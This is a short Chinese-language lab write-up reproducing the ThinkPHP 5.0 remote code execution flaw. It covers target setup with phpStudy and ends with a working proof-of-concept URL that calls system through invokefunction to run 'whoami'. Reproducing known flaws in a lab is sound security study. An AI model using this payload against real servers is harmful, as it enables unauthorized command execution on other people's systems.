ThinkPhP 5.0 远程代码执行复现
靶机: 192.168.249.129
攻击者: 192.168.0.130
一.靶机搭建环境
使用小皮集成环境(Apache 2.4.39+PHP 7.43)
1.1将think PHP下载包解压放入根目录;
下载地址:http://www.thinkphp.cn/donate/download/id/1156.html
1.2 访问靶机环境 :http://192.168.249.129/public/
二 上Poc进行测试。
whoami查看用户:
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami